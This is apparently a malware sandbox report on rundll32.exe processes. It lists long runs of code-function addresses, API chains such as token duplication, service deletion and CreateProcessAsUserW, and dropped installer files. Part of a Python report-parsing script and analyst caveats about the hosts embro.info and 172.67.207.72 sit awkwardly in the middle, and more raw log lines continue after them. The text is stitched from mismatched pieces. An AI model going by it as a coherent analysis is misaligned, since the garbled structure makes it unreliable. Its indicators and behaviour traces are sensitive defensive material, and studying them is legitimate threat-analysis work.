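Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9773420 OpenSCManagerA,OpenServiceW,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle, 33_2_0000021BD9773420
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD978B1D0 WTSQueryUserToken,GetCurrentProcess,OpenProcessToken,WTSQueryUserToken,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,DuplicateTokenEx,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,CloseHandle,CloseHandle, 33_2_0000021BD978B1D0
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}\2e04d05a72bbb297aebc410e888a6ad5
"""

if __name__ == "__main__":
    rep = parse_report(SAMPLE)
    for host, procs in suspicious_hosts(rep).items():
        print(f"host {host:<12} from {sorted(procs)}")
    print("tls peers:", sorted(rep.tls_peers), "techniques:", rep.techniques, "dropped:", rep.dropped)
```

Two caveats when reading the output. Hosts that surface as fragments (dynamic.t, t0.ss) are truncated strings and are only resolvable from the full memory dump, so they are left in the suspicious set for manual review rather than guessed at. And the report lines above do not state which hostname the 172.67.207.72:443 sessions carried; linking that peer to embro.info is an analyst inference from co-occurrence, not something the sandbox asserts.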
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A3488 6_2_046A3488
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B2710 6_2_046B2710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A1130 6_2_046A1130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A1B42 6_2_046A1B42
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B5C20 6_2_046B5C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BCC20 6_2_046BCC20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C0574 6_2_046C0574
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A5DA1 6_2_046A5DA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BA5BB 6_2_046BA5BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046ADF40 6_2_046ADF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C2008 6_2_046C2008
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A5887 6_2_046A5887
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C9150 6_2_046C9150
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B11F0 6_2_046B11F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C39D9 6_2_046C39D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C7994 6_2_046C7994
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A7222 6_2_046A7222
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A9220 6_2_046A9220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A6AA5 6_2_046A6AA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B1390 6_2_046B1390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E3488 7_2_045E3488
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F2710 7_2_045F2710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E1130 7_2_045E1130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E1B42 7_2_045E1B42
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F5C20 7_2_045F5C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045FCC20 7_2_045FCC20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04600574 7_2_04600574
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045FA5BB 7_2_045FA5BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E5DA1 7_2_045E5DA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045EDF40 7_2_045EDF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04602008 7_2_04602008
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E5887 7_2_045E5887
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04609150 7_2_04609150
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F11F0 7_2_045F11F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_046039D9 7_2_046039D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04607994 7_2_04607994
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E7222 7_2_045E7222
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E9220 7_2_045E9220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E6AA5 7_2_045E6AA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F1390 7_2_045F1390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03451B42 15_2_03451B42
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03451130 15_2_03451130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03462710 15_2_03462710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03453488 15_2_03453488
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03461390 15_2_03461390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03459220 15_2_03459220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03457222 15_2_03457222
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03456AA5 15_2_03456AA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03479150 15_2_03479150
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_034739D9 15_2_034739D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_034611F0 15_2_034611F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03477994 15_2_03477994
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03472008 15_2_03472008
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03455887 15_2_03455887
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0345DF40 15_2_0345DF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03470574 15_2_03470574
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03455DA1 15_2_03455DA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0346A5BB 15_2_0346A5BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03465C20 15_2_03465C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0346CC20 15_2_0346CC20
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9431090 33_2_0000021BD9431090
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9438800 33_2_0000021BD9438800
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9446018 33_2_0000021BD9446018
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9445038 33_2_0000021BD9445038
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD943E39C 33_2_0000021BD943E39C
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9434360 33_2_0000021BD9434360
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD943F610 33_2_0000021BD943F610
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD94379C0 33_2_0000021BD94379C0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD94461D8 33_2_0000021BD94461D8
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD94461E0 33_2_0000021BD94461E0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD94455E3 33_2_0000021BD94455E3
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9436164 33_2_0000021BD9436164
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97C1820 33_2_0000021BD97C1820
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD979C6C0 33_2_0000021BD979C6C0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97717B0 33_2_0000021BD97717B0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD979676C 33_2_0000021BD979676C
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD978E758 33_2_0000021BD978E758
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97D173C 33_2_0000021BD97D173C
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9786A20 33_2_0000021BD9786A20
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97BBA94 33_2_0000021BD97BBA94
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97C9A6C 33_2_0000021BD97C9A6C
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B5A64 33_2_0000021BD97B5A64
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97A7924 33_2_0000021BD97A7924
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97C6918 33_2_0000021BD97C6918
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B28E4 33_2_0000021BD97B28E4
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97C28CC 33_2_0000021BD97C28CC
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97A19A0 33_2_0000021BD97A19A0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97A8BE8 33_2_0000021BD97A8BE8
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97A3C74 33_2_0000021BD97A3C74
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD977DB30 33_2_0000021BD977DB30
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9771B00 33_2_0000021BD9771B00
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97AFABC 33_2_0000021BD97AFABC
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B7B7C 33_2_0000021BD97B7B7C
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD978FB44 33_2_0000021BD978FB44
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B5E34 33_2_0000021BD97B5E34
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9789E80 33_2_0000021BD9789E80
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD979BE44 33_2_0000021BD979BE44
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97C9D00 33_2_0000021BD97C9D00
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9771CD0 33_2_0000021BD9771CD0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9799024 33_2_0000021BD9799024
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9771FC0 33_2_0000021BD9771FC0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97A6EE8 33_2_0000021BD97A6EE8
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97C9ED0 33_2_0000021BD97C9ED0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B6EC0 33_2_0000021BD97B6EC0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97AEF94 33_2_0000021BD97AEF94
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B1230 33_2_0000021BD97B1230
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97D3220 33_2_0000021BD97D3220
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97D3218 33_2_0000021BD97D3218
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97D3210 33_2_0000021BD97D3210
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B6204 33_2_0000021BD97B6204
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97D3200 33_2_0000021BD97D3200
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97D31E8 33_2_0000021BD97D31E8
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97D31D8 33_2_0000021BD97D31D8
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97931CC 33_2_0000021BD97931CC
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97922AC 33_2_0000021BD97922AC
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97BC2A4 33_2_0000021BD97BC2A4
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD979E2A0 33_2_0000021BD979E2A0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9799298 33_2_0000021BD9799298
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97C4274 33_2_0000021BD97C4274
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B4128 33_2_0000021BD97B4128
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9787110 33_2_0000021BD9787110
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B3188 33_2_0000021BD97B3188
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97C3150 33_2_0000021BD97C3150
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97A1418 33_2_0000021BD97A1418
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97963BC 33_2_0000021BD97963BC
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD977A490 33_2_0000021BD977A490
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97A8490 33_2_0000021BD97A8490
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B22E4 33_2_0000021BD97B22E4
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97D32E0 33_2_0000021BD97D32E0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97752D0 33_2_0000021BD97752D0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B8368 33_2_0000021BD97B8368
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97CC348 33_2_0000021BD97CC348
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97A05EC 33_2_0000021BD97A05EC
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97B05E4 33_2_0000021BD97B05E4
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97C668C 33_2_0000021BD97C668C
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97C9680 33_2_0000021BD97C9680
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97A564C 33_2_0000021BD97A564C
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9784520 33_2_0000021BD9784520
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97724D0 33_2_0000021BD97724D0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97A44D8 33_2_0000021BD97A44D8
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97925B8 33_2_0000021BD97925B8
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD979A550 33_2_0000021BD979A550
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8851090 34_2_00000166D8851090
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8856164 34_2_00000166D8856164
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D88579C0 34_2_00000166D88579C0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D88655E3 34_2_00000166D88655E3
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D88661E0 34_2_00000166D88661E0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D885F610 34_2_00000166D885F610
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8854360 34_2_00000166D8854360
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D885E39C 34_2_00000166D885E39C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8865038 34_2_00000166D8865038
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8858800 34_2_00000166D8858800
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8866018 34_2_00000166D8866018
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F79D00 34_2_00000166D8F79D00
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F21CD0 34_2_00000166D8F21CD0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F39E80 34_2_00000166D8F39E80
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F4BE44 34_2_00000166D8F4BE44
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F65E34 34_2_00000166D8F65E34
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F5EF94 34_2_00000166D8F5EF94
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F56EE8 34_2_00000166D8F56EE8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F79ED0 34_2_00000166D8F79ED0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F66EC0 34_2_00000166D8F66EC0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F49024 34_2_00000166D8F49024
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F21FC0 34_2_00000166D8F21FC0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F63188 34_2_00000166D8F63188
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F73150 34_2_00000166D8F73150
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F64128 34_2_00000166D8F64128
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F37110 34_2_00000166D8F37110
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F49298 34_2_00000166D8F49298
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F6C2A4 34_2_00000166D8F6C2A4
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F4E2A0 34_2_00000166D8F4E2A0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F74274 34_2_00000166D8F74274
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F61230 34_2_00000166D8F61230
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F83220 34_2_00000166D8F83220
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F83218 34_2_00000166D8F83218
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F83210 34_2_00000166D8F83210
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F83208 34_2_00000166D8F83208
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F83200 34_2_00000166D8F83200
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F66204 34_2_00000166D8F66204
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F831F8 34_2_00000166D8F831F8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F831F0 34_2_00000166D8F831F0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F831E8 34_2_00000166D8F831E8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F831E0 34_2_00000166D8F831E0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F831D8 34_2_00000166D8F831D8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F431CC 34_2_00000166D8F431CC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F831D0 34_2_00000166D8F831D0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F831C8 34_2_00000166D8F831C8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F831B0 34_2_00000166D8F831B0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F68368 34_2_00000166D8F68368
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F7C348 34_2_00000166D8F7C348
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F832E0 34_2_00000166D8F832E0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F622E4 34_2_00000166D8F622E4
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F252D0 34_2_00000166D8F252D0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F422AC 34_2_00000166D8F422AC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F2A490 34_2_00000166D8F2A490
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F58490 34_2_00000166D8F58490
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F51418 34_2_00000166D8F51418
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F463BC 34_2_00000166D8F463BC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F4A550 34_2_00000166D8F4A550
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F34520 34_2_00000166D8F34520
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F544D8 34_2_00000166D8F544D8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F224D0 34_2_00000166D8F224D0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F7668C 34_2_00000166D8F7668C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F79680 34_2_00000166D8F79680
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F5564C 34_2_00000166D8F5564C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F505EC 34_2_00000166D8F505EC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F605E4 34_2_00000166D8F605E4
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F425B8 34_2_00000166D8F425B8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F4676C 34_2_00000166D8F4676C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F3E758 34_2_00000166D8F3E758
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F8173C 34_2_00000166D8F8173C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F4C6C0 34_2_00000166D8F4C6C0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F71820 34_2_00000166D8F71820
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F217B0 34_2_00000166D8F217B0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F519A0 34_2_00000166D8F519A0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F76918 34_2_00000166D8F76918
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F57924 34_2_00000166D8F57924
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F628E4 34_2_00000166D8F628E4
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F728CC 34_2_00000166D8F728CC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F6BA94 34_2_00000166D8F6BA94
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F79A6C 34_2_00000166D8F79A6C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F65A64 34_2_00000166D8F65A64
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F36A20 34_2_00000166D8F36A20
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F67B7C 34_2_00000166D8F67B7C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F3FB44 34_2_00000166D8F3FB44
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F2DB30 34_2_00000166D8F2DB30
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F21B00 34_2_00000166D8F21B00
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F5FABC 34_2_00000166D8F5FABC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F53C74 34_2_00000166D8F53C74
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F58BE8 34_2_00000166D8F58BE8
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66E11B0 39_2_000001C9C66E11B0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66E2B70 39_2_000001C9C66E2B70
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66EEB4C 39_2_000001C9C66EEB4C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66F6B48 39_2_000001C9C66F6B48
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66F8018 39_2_000001C9C66F8018
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66E7020 39_2_000001C9C66E7020
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66F0510 39_2_000001C9C66F0510
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66E4D9C 39_2_000001C9C66E4D9C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66E69F0 39_2_000001C9C66E69F0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66E6240 39_2_000001C9C66E6240
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C858F0C0 39_2_000001C9C858F0C0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85851A0 39_2_000001C9C85851A0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8551217 39_2_000001C9C8551217
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C329C 39_2_000001C9C85C329C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C857D260 39_2_000001C9C857D260
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CB304 39_2_000001C9C85CB304
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85692D0 39_2_000001C9C85692D0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8567369 39_2_000001C9C8567369
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B1420 39_2_000001C9C85B1420
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C53B0 39_2_000001C9C85C53B0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85833E1 39_2_000001C9C85833E1
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85674F0 39_2_000001C9C85674F0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C3510 39_2_000001C9C85C3510
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85D358C 39_2_000001C9C85D358C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B9540 39_2_000001C9C85B9540
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85BB66C 39_2_000001C9C85BB66C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C7740 39_2_000001C9C85C7740
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C5880 39_2_000001C9C85C5880
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85DA8C8 39_2_000001C9C85DA8C8
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C855A974 39_2_000001C9C855A974
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CCA04 39_2_000001C9C85CCA04
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C853E9B0 39_2_000001C9C853E9B0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85769D0 39_2_000001C9C85769D0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85A2AA0 39_2_000001C9C85A2AA0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C856AAC0 39_2_000001C9C856AAC0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85D8B40 39_2_000001C9C85D8B40
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B2B30 39_2_000001C9C85B2B30
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C8CA8 39_2_000001C9C85C8CA8
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CAC90 39_2_000001C9C85CAC90
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B4DBC 39_2_000001C9C85B4DBC
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8568DE0 39_2_000001C9C8568DE0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85A6E40 39_2_000001C9C85A6E40
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85C9058 39_2_000001C9C85C9058
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6148 39_2_000001C9C85E6148
